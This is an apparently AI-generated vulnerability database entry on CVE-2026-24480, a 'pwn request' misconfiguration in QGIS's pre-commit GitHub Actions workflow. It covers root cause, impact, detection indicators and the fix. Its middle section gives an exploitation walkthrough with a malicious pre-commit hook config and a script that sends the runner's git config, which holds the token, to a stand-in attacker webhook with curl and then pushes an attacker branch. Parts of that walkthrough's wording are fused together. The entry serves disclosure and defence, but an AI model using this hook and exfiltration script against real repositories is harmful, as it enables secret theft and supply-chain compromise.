
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24480 is a GitHub Actions workflow misconfiguration vulnerability in the QGIS open-source GIS project that allows remote code execution and repository compromise. The "pre-commit checks" workflow used the pull_request_target trigger and executed untrusted pull request code in a privileged context, enabling attackers to run arbitrary commands with the base repository's elevated credentials and access to secrets. It affects all QGIS repository versions prior to commit 76a693cd91650f9b4e83edac525e5e4f90d954e9, published January 24, 2026. The vulnerability carries a CVSS v4.0 base score of 8.7 (High) (GitHub Advisory, Red Hat Bugzilla).
The root cause is an incorrect authorization pattern (CWE-863) in the .github/workflows/pre-commit.yaml file, which combined the pull_request_target trigger — which runs with the base repository's write-scoped GITHUB_TOKEN and access to secrets — with a step that checked out and executed code from the head of an external (potentially attacker-controlled) pull request via pre-commit run --files ${MODIFIED_FILES[@]}. The workflow also responded to issue_comment events with the /fix-precommit command, further expanding the attack surface. Because pull_request_target grants elevated permissions (contents: write, issues: write, pull-requests: write) while executing untrusted fork code, any external contributor could submit a malicious pull request containing a crafted .pre-commit-config.yaml to achieve arbitrary command execution. This pattern is documented as a "pwn request" attack by GitHub Security Lab (GitHub Advisory, Fix Commit).
Successful exploitation allows an attacker to execute arbitrary commands on GitHub Actions runners with the base repository's elevated privileges, exfiltrate secrets and tokens (including the write-scoped GITHUB_TOKEN) from the workflow environment, push malicious commits or create branches, modify release artifacts or CI/CD configuration, and inject backdoors into the QGIS codebase. This constitutes a full supply chain attack risk: all packages and releases built while the vulnerability existed are potentially compromised, as attackers could have tampered with source code included in subsequent builds and distributed to downstream users (GitHub Advisory).
No public proof-of-concept exploit code has been released, and there is no evidence of in-the-wild exploitation at this time (Feedly). The vulnerability was discovered and responsibly disclosed by Barak Haryati, Director of Product Security at JFrog, as part of JFrog's Open Source and Supply Chain Security research program. A proof-of-concept was demonstrated internally against a fork of the repository to validate the attack chain. The EPSS score is approximately 0.31%, indicating low current exploitation probability. The vulnerability is not listed in the CISA KEV catalog (GitHub Advisory, Feedly).
pull_request_target trigger in .github/workflows/pre-commit.yaml of the QGIS repository (versions prior to commit 76a693cd91650f9b4e83edac525e5e4f90d954e9) by reviewing the public workflow file..pre-commit-config.yaml to the fork that defines a local hook executing an attacker-controlled script (e.g., myscript.sh):repos:
- repo: local
hooks:
- id: pwn
name: pwn
entry: bash -c 'chmod +x myscript.sh; ./myscript.sh'
language: system
always_run: true
pass_filenames: falsemyscript.sh to exfiltrate the GITHUB_TOKEN and demonstrate write access:#!/bin/bash
curl -X POST --data "$(cat /home/runner/work/QGIS/.git/config)" https://attacker-webhook.example.com/token
git config --global user.email "attacker@example.com"
git config --global user.name "Attacker"
git checkout -b attacker-poc
git push -u origin attacker-poc.pre-commit-config.yaml and myscript.sh.pull_request_target event fires the "pre-commit checks" workflow with the base repository's elevated GITHUB_TOKEN (write-scoped), which checks out and executes the attacker's code.pull_request_target from external fork pull requests; workflow runs showing execution of .pre-commit-config.yaml from PR head branches; outbound curl or wget requests to unknown external URLs in runner logs.attacker-poc, fix/pre-commit-*) by automated or unexpected accounts; unexpected commits from GitHub Actions bot accounts to protected branches; new or modified workflow files in .github/workflows/.GITHUB_TOKEN or repository secrets being used from unexpected IP addresses or geographic locations; unauthorized API calls to GitHub REST API using repository credentials..pre-commit-config.yaml with local repo hooks or entry fields referencing shell scripts; presence of shell scripts (.sh) in PR diffs that are referenced by pre-commit hooks (GitHub Advisory).The vulnerability was fixed in commit 76a693cd91650f9b4e83edac525e5e4f90d954e9, which replaced the pull_request_target trigger with pull_request and removed the issue_comment trigger and associated privileged code execution steps from the pre-commit workflow. Organizations using QGIS or maintaining similar GitHub Actions workflows should: (1) update to a QGIS version containing the fix commit; (2) replace pull_request_target with pull_request for any workflow that executes code from pull requests; (3) restrict workflow token permissions to the minimum required (principle of least privilege); (4) audit all workflow runs and git history for unauthorized activity; and (5) rotate any secrets or tokens that were accessible to the compromised workflow (Fix Commit, GitHub Advisory).
The vulnerability was discovered by Barak Haryati of JFrog as part of their Open Source and Supply Chain Security research initiative, and JFrog published a blog post covering the finding (JFrog Blog). The advisory was published by QGIS maintainer m-kuhn on January 24, 2026. Security news outlets including Infinit Security and Pro-Linux covered the disclosure, and the vulnerability was tracked by INCIBE-CERT and CCN-CERT in Spain. Community reaction highlighted the broader risk of the pull_request_target "pwn request" pattern, which GitHub Security Lab has previously documented as a systemic CI/CD security risk affecting many open-source projects.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."